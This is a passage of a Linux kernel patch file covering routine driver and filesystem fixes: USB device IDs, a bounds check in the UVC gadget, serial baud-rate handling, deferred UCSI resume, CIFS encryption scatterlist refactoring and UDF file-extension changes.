+ static int mt7621_pcie_probe(struct platform_device *pdev)
+diff --git a/drivers/staging/r8188eu/core/rtw_led.c b/drivers/staging/r8188eu/core/rtw_led.c
+index 1e316e6358ea2..48c5db69929c3 100644
+--- a/drivers/staging/r8188eu/core/rtw_led.c
++++ b/drivers/staging/r8188eu/core/rtw_led.c
+@@ -32,40 +32,19 @@ static void ResetLedStatus(struct led_priv *pLed)
+ 
+ static void SwLedOn(struct adapter *padapter, struct led_priv *pLed)
+ {
+-	u8	LedCfg;
+-	int res;
+-
+ 	if (padapter->bDriverStopped)
+ 		return;
+ 
+-	res = rtw_read8(padapter, REG_LEDCFG2, &LedCfg);
+-	if (res)
+-		return;
+-
+-	rtw_write8(padapter, REG_LEDCFG2, (LedCfg & 0xf0) | BIT(5) | BIT(6)); /*  SW control led0 on. */
++	rtw_write8(padapter, REG_LEDCFG2, BIT(5)); /*  SW control led0 on. */
+ 	pLed->bLedOn = true;
+ }
+ 
+ static void SwLedOff(struct adapter *padapter, struct led_priv *pLed)
+ {
+-	u8	LedCfg;
+-	int res;
+-
+ 	if (padapter->bDriverStopped)
+ 		goto exit;
+ 
+-	res = rtw_read8(padapter, REG_LEDCFG2, &LedCfg);/* 0x4E */
+-	if (res)
+-		goto exit;
+-
+-	LedCfg &= 0x90; /*  Set to software control. */
+-	rtw_write8(padapter, REG_LEDCFG2, (LedCfg | BIT(3)));
+-	res = rtw_read8(padapter, REG_MAC_PINMUX_CFG, &LedCfg);
+-	if (res)
+-		goto exit;
+-
+-	LedCfg &= 0xFE;
+-	rtw_write8(padapter, REG_MAC_PINMUX_CFG, LedCfg);
++	rtw_write8(padapter, REG_LEDCFG2, BIT(5) | BIT(3));
+ exit:
+ 	pLed->bLedOn = false;
+ }
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index fb14511b1e10f..89c9ab2b19f85 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -45,7 +45,7 @@
+ #define PCI_DEVICE_ID_INTEL_ADLN		0x465e
+ #define PCI_DEVICE_ID_INTEL_ADLN_PCH		0x54ee
+ #define PCI_DEVICE_ID_INTEL_ADLS		0x7ae1
+-#define PCI_DEVICE_ID_INTEL_RPL			0x460e
++#define PCI_DEVICE_ID_INTEL_RPL			0xa70e
+ #define PCI_DEVICE_ID_INTEL_RPLS		0x7a61
+ #define PCI_DEVICE_ID_INTEL_MTLP		0x7ec1
+ #define PCI_DEVICE_ID_INTEL_MTL			0x7e7e
+diff --git a/drivers/usb/gadget/function/f_uvc.c b/drivers/usb/gadget/function/f_uvc.c
+index 6e196e06181ec..4419b7972e78f 100644
+--- a/drivers/usb/gadget/function/f_uvc.c
++++ b/drivers/usb/gadget/function/f_uvc.c
+@@ -216,8 +216,9 @@ uvc_function_ep0_complete(struct usb_ep *ep, struct usb_request *req)
+ 
+ 		memset(&v4l2_event, 0, sizeof(v4l2_event));
+ 		v4l2_event.type = UVC_EVENT_DATA;
+-		uvc_event->data.length = req->actual;
+-		memcpy(&uvc_event->data.data, req->buf, req->actual);
++		uvc_event->data.length = min_t(unsigned int, req->actual,
++			sizeof(uvc_event->data.data));
++		memcpy(&uvc_event->data.data, req->buf, uvc_event->data.length);
+ 		v4l2_event_queue(&uvc->vdev, &v4l2_event);
+ 	}
+ }
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 7bccbe50bab15..f98cf30a3c1a5 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -59,6 +59,7 @@
+ #define PCI_DEVICE_ID_INTEL_TIGER_LAKE_XHCI		0x9a13
+ #define PCI_DEVICE_ID_INTEL_MAPLE_RIDGE_XHCI		0x1138
+ #define PCI_DEVICE_ID_INTEL_ALDER_LAKE_PCH_XHCI		0x51ed
++#define PCI_DEVICE_ID_INTEL_ALDER_LAKE_N_PCH_XHCI	0x54ed
+ 
+ #define PCI_DEVICE_ID_AMD_RENOIR_XHCI			0x1639
+ #define PCI_DEVICE_ID_AMD_PROMONTORYA_4			0x43b9
+@@ -246,7 +247,8 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 		xhci->quirks |= XHCI_MISSING_CAS;
+ 
+ 	if (pdev->vendor == PCI_VENDOR_ID_INTEL &&
+-	    pdev->device == PCI_DEVICE_ID_INTEL_ALDER_LAKE_PCH_XHCI)
++	    (pdev->device == PCI_DEVICE_ID_INTEL_ALDER_LAKE_PCH_XHCI ||
++	     pdev->device == PCI_DEVICE_ID_INTEL_ALDER_LAKE_N_PCH_XHCI))
+ 		xhci->quirks |= XHCI_RESET_TO_DEFAULT;
+ 
+ 	if (pdev->vendor == PCI_VENDOR_ID_INTEL &&
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index 3bcec419f4632..f6fb23620e87a 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -195,6 +195,8 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x16DC, 0x0015) }, /* W-IE-NE-R Plein & Baus GmbH CML Control, Monitoring and Data Logger */
+ 	{ USB_DEVICE(0x17A8, 0x0001) }, /* Kamstrup Optical Eye/3-wire */
+ 	{ USB_DEVICE(0x17A8, 0x0005) }, /* Kamstrup M-Bus Master MultiPort 250D */
++	{ USB_DEVICE(0x17A8, 0x0011) }, /* Kamstrup 444 MHz RF sniffer */
++	{ USB_DEVICE(0x17A8, 0x0013) }, /* Kamstrup 870 MHz RF sniffer */
+ 	{ USB_DEVICE(0x17A8, 0x0101) }, /* Kamstrup 868 MHz wM-Bus C-Mode Meter Reader (Int Ant) */
+ 	{ USB_DEVICE(0x17A8, 0x0102) }, /* Kamstrup 868 MHz wM-Bus C-Mode Meter Reader (Ext Ant) */
+ 	{ USB_DEVICE(0x17F4, 0xAAAA) }, /* Wavesense Jazz blood glucose meter */
+diff --git a/drivers/usb/serial/f81232.c b/drivers/usb/serial/f81232.c
+index 2dd58cd9f0ccb..891fb1fe69df7 100644
+--- a/drivers/usb/serial/f81232.c
++++ b/drivers/usb/serial/f81232.c
+@@ -130,9 +130,6 @@ static u8 const clock_table[] = { F81232_CLK_1_846_MHZ, F81232_CLK_14_77_MHZ,
+ 
+ static int calc_baud_divisor(speed_t baudrate, speed_t clockrate)
+ {
+-	if (!baudrate)
+-		return 0;
+-
+ 	return DIV_ROUND_CLOSEST(clockrate, baudrate);
+ }
+ 
+@@ -498,9 +495,14 @@ static void f81232_set_baudrate(struct tty_struct *tty,
+ 	speed_t baud_list[] = { baudrate, old_baudrate, F81232_DEF_BAUDRATE };
+ 
+ 	for (i = 0; i < ARRAY_SIZE(baud_list); ++i) {
+-		idx = f81232_find_clk(baud_list[i]);
++		baudrate = baud_list[i];
++		if (baudrate == 0) {
++			tty_encode_baud_rate(tty, 0, 0);
++			return;
++		}
++
++		idx = f81232_find_clk(baudrate);
+ 		if (idx >= 0) {
+-			baudrate = baud_list[i];
+ 			tty_encode_baud_rate(tty, baudrate, baudrate);
+ 			break;
+ 		}
+diff --git a/drivers/usb/serial/f81534.c b/drivers/usb/serial/f81534.c
+index ddfcd72eb0ae7..4083ae961be43 100644
+--- a/drivers/usb/serial/f81534.c
++++ b/drivers/usb/serial/f81534.c
+@@ -536,9 +536,6 @@ static int f81534_submit_writer(struct usb_serial_port *port, gfp_t mem_flags)
+ 
+ static u32 f81534_calc_baud_divisor(u32 baudrate, u32 clockrate)
+ {
+-	if (!baudrate)
+-		return 0;
+-
+ 	/* Round to nearest divisor */
+ 	return DIV_ROUND_CLOSEST(clockrate, baudrate);
+ }
+@@ -568,9 +565,14 @@ static int f81534_set_port_config(struct usb_serial_port *port,
+ 	u32 baud_list[] = {baudrate, old_baudrate, F81534_DEFAULT_BAUD_RATE};
+ 
+ 	for (i = 0; i < ARRAY_SIZE(baud_list); ++i) {
+-		idx = f81534_find_clk(baud_list[i]);
++		baudrate = baud_list[i];
++		if (baudrate == 0) {
++			tty_encode_baud_rate(tty, 0, 0);
++			return 0;
++		}
++
++		idx = f81534_find_clk(baudrate);
+ 		if (idx >= 0) {
+-			baudrate = baud_list[i];
+ 			tty_encode_baud_rate(tty, baudrate, baudrate);
+ 			break;
+ 		}
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index c3b7f1d98e781..dee79c7d82d5c 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -255,6 +255,7 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_EP06			0x0306
+ #define QUECTEL_PRODUCT_EM05G			0x030a
+ #define QUECTEL_PRODUCT_EM060K			0x030b
++#define QUECTEL_PRODUCT_EM05G_SG		0x0311
+ #define QUECTEL_PRODUCT_EM12			0x0512
+ #define QUECTEL_PRODUCT_RM500Q			0x0800
+ #define QUECTEL_PRODUCT_RM520N			0x0801
+@@ -1160,6 +1161,8 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EP06, 0xff, 0, 0) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G, 0xff),
+ 	  .driver_info = RSVD(6) | ZLP },
++	{ USB_DEVICE_INTERFACE_CLASS(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM05G_SG, 0xff),
++	  .driver_info = RSVD(6) | ZLP },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K, 0xff, 0xff, 0x40) },
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index a7987fc764cc6..eabe519013e78 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1270,8 +1270,9 @@ err:
+ 	return ret;
+ }
+ 
+-int ucsi_resume(struct ucsi *ucsi)
++static void ucsi_resume_work(struct work_struct *work)
+ {
++	struct ucsi *ucsi = container_of(work, struct ucsi, resume_work);
+ 	struct ucsi_connector *con;
+ 	u64 command;
+ 	int ret;
+@@ -1279,15 +1280,21 @@ int ucsi_resume(struct ucsi *ucsi)
+ 	/* Restore UCSI notification enable mask after system resume */
+ 	command = UCSI_SET_NOTIFICATION_ENABLE | ucsi->ntfy;
+ 	ret = ucsi_send_command(ucsi, command, NULL, 0);
+-	if (ret < 0)
+-		return ret;
++	if (ret < 0) {
++		dev_err(ucsi->dev, "failed to re-enable notifications (%d)\n", ret);
++		return;
++	}
+ 
+ 	for (con = ucsi->connector; con->port; con++) {
+ 		mutex_lock(&con->lock);
+-		ucsi_check_connection(con);
++		ucsi_partner_task(con, ucsi_check_connection, 1, 0);
+ 		mutex_unlock(&con->lock);
+ 	}
++}
+ 
++int ucsi_resume(struct ucsi *ucsi)
++{
++	queue_work(system_long_wq, &ucsi->resume_work);
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(ucsi_resume);
+@@ -1347,6 +1354,7 @@ struct ucsi *ucsi_create(struct device *dev, const struct ucsi_operations *ops)
+ 	if (!ucsi)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	INIT_WORK(&ucsi->resume_work, ucsi_resume_work);
+ 	INIT_DELAYED_WORK(&ucsi->work, ucsi_init_work);
+ 	mutex_init(&ucsi->ppm_lock);
+ 	ucsi->dev = dev;
+@@ -1401,6 +1409,7 @@ void ucsi_unregister(struct ucsi *ucsi)
+ 
+ 	/* Make sure that we are not in the middle of driver initialization */
+ 	cancel_delayed_work_sync(&ucsi->work);
++	cancel_work_sync(&ucsi->resume_work);
+ 
+ 	/* Disable notifications */
+ 	ucsi->ops->async_write(ucsi, UCSI_CONTROL, &cmd, sizeof(cmd));
+diff --git a/drivers/usb/typec/ucsi/ucsi.h b/drivers/usb/typec/ucsi/ucsi.h
+index 8eb391e3e592c..c968474ee5473 100644
+--- a/drivers/usb/typec/ucsi/ucsi.h
++++ b/drivers/usb/typec/ucsi/ucsi.h
+@@ -287,6 +287,7 @@ struct ucsi {
+ 	struct ucsi_capability cap;
+ 	struct ucsi_connector *connector;
+ 
++	struct work_struct resume_work;
+ 	struct delayed_work work;
+ 	int work_count;
+ #define UCSI_ROLE_SWITCH_RETRY_PER_HZ	10
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+index 1420acf987f03..157d3c0e3cc76 100644
+--- a/fs/cifs/cifsglob.h
++++ b/fs/cifs/cifsglob.h
+@@ -13,6 +13,8 @@
+ #include <linux/in6.h>
+ #include <linux/inet.h>
+ #include <linux/slab.h>
++#include <linux/scatterlist.h>
++#include <linux/mm.h>
+ #include <linux/mempool.h>
+ #include <linux/workqueue.h>
+ #include <linux/utsname.h>
+@@ -2137,4 +2139,70 @@ static inline void move_cifs_info_to_smb2(struct smb2_file_all_info *dst, const
+ 	dst->FileNameLength = src->FileNameLength;
+ }
+ 
++static inline unsigned int cifs_get_num_sgs(const struct smb_rqst *rqst,
++					    int num_rqst,
++					    const u8 *sig)
++{
++	unsigned int len, skip;
++	unsigned int nents = 0;
++	unsigned long addr;
++	int i, j;
++
++	/* Assumes the first rqst has a transform header as the first iov.
++	 * I.e.
++	 * rqst[0].rq_iov[0]  is transform header
++	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
++	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
++	 */
++	for (i = 0; i < num_rqst; i++) {
++		/*
++		 * The first rqst has a transform header where the
++		 * first 20 bytes are not part of the encrypted blob.
++		 */
++		for (j = 0; j < rqst[i].rq_nvec; j++) {
++			struct kvec *iov = &rqst[i].rq_iov[j];
++
++			skip = (i == 0) && (j == 0) ? 20 : 0;
++			addr = (unsigned long)iov->iov_base + skip;
++			if (unlikely(is_vmalloc_addr((void *)addr))) {
++				len = iov->iov_len - skip;
++				nents += DIV_ROUND_UP(offset_in_page(addr) + len,
++						      PAGE_SIZE);
++			} else {
++				nents++;
++			}
++		}
++		nents += rqst[i].rq_npages;
++	}
++	nents += DIV_ROUND_UP(offset_in_page(sig) + SMB2_SIGNATURE_SIZE, PAGE_SIZE);
++	return nents;
++}
++
++/* We can not use the normal sg_set_buf() as we will sometimes pass a
++ * stack object as buf.
++ */
++static inline struct scatterlist *cifs_sg_set_buf(struct scatterlist *sg,
++						  const void *buf,
++						  unsigned int buflen)
++{
++	unsigned long addr = (unsigned long)buf;
++	unsigned int off = offset_in_page(addr);
++
++	addr &= PAGE_MASK;
++	if (unlikely(is_vmalloc_addr((void *)addr))) {
++		do {
++			unsigned int len = min_t(unsigned int, buflen, PAGE_SIZE - off);
++
++			sg_set_page(sg++, vmalloc_to_page((void *)addr), len, off);
++
++			off = 0;
++			addr += PAGE_SIZE;
++			buflen -= len;
++		} while (buflen);
++	} else {
++		sg_set_page(sg++, virt_to_page(addr), buflen, off);
++	}
++	return sg;
++}
++
+ #endif	/* _CIFS_GLOB_H */
+diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h
+index 83e83d8beabba..eb1a0de9dd553 100644
+--- a/fs/cifs/cifsproto.h
++++ b/fs/cifs/cifsproto.h
+@@ -600,8 +600,8 @@ int setup_aio_ctx_iter(struct cifs_aio_ctx *ctx, struct iov_iter *iter, int rw);
+ int cifs_alloc_hash(const char *name, struct shash_desc **sdesc);
+ void cifs_free_hash(struct shash_desc **sdesc);
+ 
+-extern void rqst_page_get_length(struct smb_rqst *rqst, unsigned int page,
+-				unsigned int *len, unsigned int *offset);
++void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
++			  unsigned int *len, unsigned int *offset);
+ struct cifs_chan *
+ cifs_ses_find_chan(struct cifs_ses *ses, struct TCP_Server_Info *server);
+ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses);
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 3e68d8208cf5e..1cbecd64d697f 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1136,8 +1136,8 @@ cifs_free_hash(struct shash_desc **sdesc)
+  * @len: Where to store the length for this page:
+  * @offset: Where to store the offset for this page
+  */
+-void rqst_page_get_length(struct smb_rqst *rqst, unsigned int page,
+-				unsigned int *len, unsigned int *offset)
++void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
++			  unsigned int *len, unsigned int *offset)
+ {
+ 	*len = rqst->rq_pagesz;
+ 	*offset = (page == 0) ? rqst->rq_offset : 0;
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index bfaafd02fb1f2..b24e68b5ccd61 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -4204,69 +4204,82 @@ fill_transform_hdr(struct smb2_transform_hdr *tr_hdr, unsigned int orig_len,
+ 	memcpy(&tr_hdr->SessionId, &shdr->SessionId, 8);
+ }
+ 
+-/* We can not use the normal sg_set_buf() as we will sometimes pass a
+- * stack object as buf.
+- */
+-static inline void smb2_sg_set_buf(struct scatterlist *sg, const void *buf,
+-				   unsigned int buflen)
++static void *smb2_aead_req_alloc(struct crypto_aead *tfm, const struct smb_rqst *rqst,
++				 int num_rqst, const u8 *sig, u8 **iv,
++				 struct aead_request **req, struct scatterlist **sgl,
++				 unsigned int *num_sgs)
+ {
+-	void *addr;
+-	/*
+-	 * VMAP_STACK (at least) puts stack into the vmalloc address space
+-	 */
+-	if (is_vmalloc_addr(buf))
+-		addr = vmalloc_to_page(buf);
+-	else
+-		addr = virt_to_page(buf);
+-	sg_set_page(sg, addr, buflen, offset_in_page(buf));
++	unsigned int req_size = sizeof(**req) + crypto_aead_reqsize(tfm);
++	unsigned int iv_size = crypto_aead_ivsize(tfm);
++	unsigned int len;
++	u8 *p;
++
++	*num_sgs = cifs_get_num_sgs(rqst, num_rqst, sig);
++
++	len = iv_size;
++	len += crypto_aead_alignmask(tfm) & ~(crypto_tfm_ctx_alignment() - 1);
++	len = ALIGN(len, crypto_tfm_ctx_alignment());
++	len += req_size;
++	len = ALIGN(len, __alignof__(struct scatterlist));
++	len += *num_sgs * sizeof(**sgl);
++
++	p = kmalloc(len, GFP_ATOMIC);
++	if (!p)
++		return NULL;
++
++	*iv = (u8 *)PTR_ALIGN(p, crypto_aead_alignmask(tfm) + 1);
++	*req = (struct aead_request *)PTR_ALIGN(*iv + iv_size,
++						crypto_tfm_ctx_alignment());
++	*sgl = (struct scatterlist *)PTR_ALIGN((u8 *)*req + req_size,
++					       __alignof__(struct scatterlist));
++	return p;
+ }
+ 
+-/* Assumes the first rqst has a transform header as the first iov.
+- * I.e.
+- * rqst[0].rq_iov[0]  is transform header
+- * rqst[0].rq_iov[1+] data to be encrypted/decrypted
+- * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
+- */
+-static struct scatterlist *
+-init_sg(int num_rqst, struct smb_rqst *rqst, u8 *sign)
++static void *smb2_get_aead_req(struct crypto_aead *tfm, const struct smb_rqst *rqst,
++			       int num_rqst, const u8 *sig, u8 **iv,
++			       struct aead_request **req, struct scatterlist **sgl)
+ {
+-	unsigned int sg_len;
++	unsigned int off, len, skip;
+ 	struct scatterlist *sg;
+-	unsigned int i;
+-	unsigned int j;
+-	unsigned int idx = 0;
+-	int skip;
+-
+-	sg_len = 1;
+-	for (i = 0; i < num_rqst; i++)
+-		sg_len += rqst[i].rq_nvec + rqst[i].rq_npages;
++	unsigned int num_sgs;
++	unsigned long addr;
++	int i, j;
++	void *p;
+ 
+-	sg = kmalloc_array(sg_len, sizeof(struct scatterlist), GFP_KERNEL);
+-	if (!sg)
++	p = smb2_aead_req_alloc(tfm, rqst, num_rqst, sig, iv, req, sgl, &num_sgs);
++	if (!p)
+ 		return NULL;
+ 
+-	sg_init_table(sg, sg_len);
++	sg_init_table(*sgl, num_sgs);
++	sg = *sgl;
++
++	/* Assumes the first rqst has a transform header as the first iov.
++	 * I.e.
++	 * rqst[0].rq_iov[0]  is transform header
++	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
++	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
++	 */
+ 	for (i = 0; i < num_rqst; i++) {
++		/*
++		 * The first rqst has a transform header where the
++		 * first 20 bytes are not part of the encrypted blob.
++		 */
+ 		for (j = 0; j < rqst[i].rq_nvec; j++) {
+-			/*
+-			 * The first rqst has a transform header where the
+-			 * first 20 bytes are not part of the encrypted blob
+-			 */
+-			skip = (i == 0) && (j == 0) ? 20 : 0;
+-			smb2_sg_set_buf(&sg[idx++],
+-					rqst[i].rq_iov[j].iov_base + skip,
+-					rqst[i].rq_iov[j].iov_len - skip);
+-			}
++			struct kvec *iov = &rqst[i].rq_iov[j];
+ 
++			skip = (i == 0) && (j == 0) ? 20 : 0;
++			addr = (unsigned long)iov->iov_base + skip;
++			len = iov->iov_len - skip;
++			sg = cifs_sg_set_buf(sg, (void *)addr, len);
++		}
+ 		for (j = 0; j < rqst[i].rq_npages; j++) {
+-			unsigned int len, offset;
+-
+-			rqst_page_get_length(&rqst[i], j, &len, &offset);
+-			sg_set_page(&sg[idx++], rqst[i].rq_pages[j], len, offset);
++			rqst_page_get_length(&rqst[i], j, &len, &off);
++			sg_set_page(sg++, rqst[i].rq_pages[j], len, off);
+ 		}
+ 	}
+-	smb2_sg_set_buf(&sg[idx], sign, SMB2_SIGNATURE_SIZE);
+-	return sg;
++	cifs_sg_set_buf(sg, sig, SMB2_SIGNATURE_SIZE);
++
++	return p;
+ }
+ 
+ static int
+@@ -4314,11 +4327,11 @@ crypt_message(struct TCP_Server_Info *server, int num_rqst,
+ 	u8 sign[SMB2_SIGNATURE_SIZE] = {};
+ 	u8 key[SMB3_ENC_DEC_KEY_SIZE];
+ 	struct aead_request *req;
+-	char *iv;
+-	unsigned int iv_len;
++	u8 *iv;
+ 	DECLARE_CRYPTO_WAIT(wait);
+ 	struct crypto_aead *tfm;
+ 	unsigned int crypt_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
++	void *creq;
+ 
+ 	rc = smb2_get_enc_key(server, le64_to_cpu(tr_hdr->SessionId), enc, key);
+ 	if (rc) {
+@@ -4352,32 +4365,15 @@ crypt_message(struct TCP_Server_Info *server, int num_rqst,
+ 		return rc;
+ 	}
+ 
+-	req = aead_request_alloc(tfm, GFP_KERNEL);
+-	if (!req) {
+-		cifs_server_dbg(VFS, "%s: Failed to alloc aead request\n", __func__);
++	creq = smb2_get_aead_req(tfm, rqst, num_rqst, sign, &iv, &req, &sg);
++	if (unlikely(!creq))
+ 		return -ENOMEM;
+-	}
+ 
+ 	if (!enc) {
+ 		memcpy(sign, &tr_hdr->Signature, SMB2_SIGNATURE_SIZE);
+ 		crypt_len += SMB2_SIGNATURE_SIZE;
+ 	}
+ 
+-	sg = init_sg(num_rqst, rqst, sign);
+-	if (!sg) {
+-		cifs_server_dbg(VFS, "%s: Failed to init sg\n", __func__);
+-		rc = -ENOMEM;
+-		goto free_req;
+-	}
+-
+-	iv_len = crypto_aead_ivsize(tfm);
+-	iv = kzalloc(iv_len, GFP_KERNEL);
+-	if (!iv) {
+-		cifs_server_dbg(VFS, "%s: Failed to alloc iv\n", __func__);
+-		rc = -ENOMEM;
+-		goto free_sg;
+-	}
+-
+ 	if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
+ 	    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+ 		memcpy(iv, (char *)tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
+@@ -4386,6 +4382,7 @@ crypt_message(struct TCP_Server_Info *server, int num_rqst,
+ 		memcpy(iv + 1, (char *)tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
+ 	}
+ 
++	aead_request_set_tfm(req, tfm);
+ 	aead_request_set_crypt(req, sg, sg, crypt_len, iv);
+ 	aead_request_set_ad(req, assoc_data_len);
+ 
+@@ -4398,11 +4395,7 @@ crypt_message(struct TCP_Server_Info *server, int num_rqst,
+ 	if (!rc && enc)
+ 		memcpy(&tr_hdr->Signature, sign, SMB2_SIGNATURE_SIZE);
+ 
+-	kfree_sensitive(iv);
+-free_sg:
+-	kfree_sensitive(sg);
+-free_req:
+-	kfree_sensitive(req);
++	kfree_sensitive(creq);
+ 	return rc;
+ }
+ 
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index dce6ae9ae306c..f713d108f21d3 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -439,6 +439,12 @@ static int udf_get_block(struct inode *inode, sector_t block,
+ 		iinfo->i_next_alloc_goal++;
+ 	}
+ 
++	/*
++	 * Block beyond EOF and prealloc extents? Just discard preallocation
++	 * as it is not useful and complicates things.
++	 */
++	if (((loff_t)block) << inode->i_blkbits > iinfo->i_lenExtents)
++		udf_discard_prealloc(inode);
+ 	udf_clear_extent_cache(inode);
+ 	phys = inode_getblk(inode, block, &err, &new);
+ 	if (!phys)
+@@ -488,8 +494,6 @@ static int udf_do_extend_file(struct inode *inode,
+ 	uint32_t add;
+ 	int count = 0, fake = !(last_ext->extLength & UDF_EXTENT_LENGTH_MASK);
+ 	struct super_block *sb = inode->i_sb;
+-	struct kernel_lb_addr prealloc_loc = {};
+-	uint32_t prealloc_len = 0;
+ 	struct udf_inode_info *iinfo;
+ 	int err;
+ 
+@@ -510,19 +514,6 @@ static int udf_do_extend_file(struct inode *inode,
+ 			~(sb->s_blocksize - 1);
+ 	}
+ 
+-	/* Last extent are just preallocated blocks? */
+-	if ((last_ext->extLength & UDF_EXTENT_FLAG_MASK) ==
+-						EXT_NOT_RECORDED_ALLOCATED) {
+-		/* Save the extent so that we can reattach it to the end */
+-		prealloc_loc = last_ext->extLocation;
+-		prealloc_len = last_ext->extLength;
+-		/* Mark the extent as a hole */
+-		last_ext->extLength = EXT_NOT_RECORDED_NOT_ALLOCATED |
+-			(last_ext->extLength & UDF_EXTENT_LENGTH_MASK);
+-		last_ext->extLocation.logicalBlockNum = 0;
+-		last_ext->extLocation.partitionReferenceNum = 0;
+-	}
+-
+ 	/* Can we merge with the previous extent? */
+ 	if ((last_ext->extLength & UDF_EXTENT_FLAG_MASK) ==
+ 					EXT_NOT_RECORDED_NOT_ALLOCATED) {
+@@ -550,7 +541,7 @@ static int udf_do_extend_file(struct inode *inode,
+ 		 * more extents, we may need to enter possible following
+ 		 * empty indirect extent.
+ 		 */
+-		if (new_block_bytes || prealloc_len)
++		if (new_block_bytes)
+ 			udf_next_aext(inode, last_pos, &tmploc, &tmplen, 0);
+ 	}
+ 
+@@ -584,17 +575,6 @@ static int udf_do_extend_file(struct inode *inode,
+ 	}
+ 
+ out:
+-	/* Do we have some preallocated blocks saved? */
+-	if (prealloc_len) {
+-		err = udf_add_aext(inode, last_pos, &prealloc_loc,
+-				   prealloc_len, 1);
+-		if (err)
+-			return err;
+-		last_ext->extLocation = prealloc_loc;
+-		last_ext->extLength = prealloc_len;
+-		count++;
+-	}
+-
+ 	/* last_pos should point to the last written extent... */
+ 	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
+ 		last_pos->offset -= sizeof(struct short_ad);
+@@ -610,13 +590,17 @@ out:
+ static void udf_do_extend_final_block(struct inode *inode,
+ 				      struct extent_position *last_pos,
+ 				      struct kernel_long_ad *last_ext,
+-				      uint32_t final_block_len)
++				      uint32_t new_elen)
+ {
+-	struct super_block *sb = inode->i_sb;
+ 	uint32_t added_bytes;
+ 
+-	added_bytes = final_block_len -
+-		      (last_ext->extLength & (sb->s_blocksize - 1));
++	/*
++	 * Extent already large enough? It may be already rounded up to block
++	 * size...
++	 */
++	if (new_elen <= (last_ext->extLength & UDF_EXTENT_LENGTH_MASK))
++		return;
++	added_bytes = (last_ext->extLength & UDF_EXTENT_LENGTH_MASK) - new_elen;
+ 	last_ext->extLength += added_bytes;
+ 	UDF_I(inode)->i_lenExtents += added_bytes;
+ 
+@@ -633,12 +617,12 @@ static int udf_extend_file(struct inode *inode, loff_t newsize)
+ 	int8_t etype;
+ 	struct super_block *sb = inode->i_sb;
+ 	sector_t first_block = newsize >> sb->s_blocksize_bits, offset;
+-	unsigned long partial_final_block;
++	loff_t new_elen;
+ 	int adsize;
+ 	struct udf_inode_info *iinfo = UDF_I(inode);
+ 	struct kernel_long_ad extent;
+ 	int err = 0;
+-	int within_final_block;
++	bool within_last_ext;
+ 
+ 	if (iinfo->i_alloc_type == ICBTAG_FLAG_AD_SHORT)
+ 		adsize = sizeof(struct short_ad);
+@@ -647,8 +631,17 @@ static int udf_extend_file(struct inode *inode, loff_t newsize)
+ 	else
+ 		BUG();
+ 
++	/*
++	 * When creating hole in file, just don't bother with preserving
++	 * preallocation. It likely won't be very useful anyway.
++	 */
++	udf_discard_prealloc(inode);
++
+ 	etype = inode_bmap(inode, first_block, &epos, &eloc, &elen, &offset);
+-	within_final_block = (etype != -1);
++	within_last_ext = (etype != -1);
++	/* We don't expect extents past EOF... */
++	WARN_ON_ONCE(within_last_ext &&
++		     elen > ((loff_t)offset + 1) << inode->i_blkbits);
+ 
+ 	if ((!epos.bh && epos.offset == udf_file_entry_alloc_offset(inode)) ||
+ 	    (epos.bh && epos.offset == sizeof(struct allocExtDesc))) {
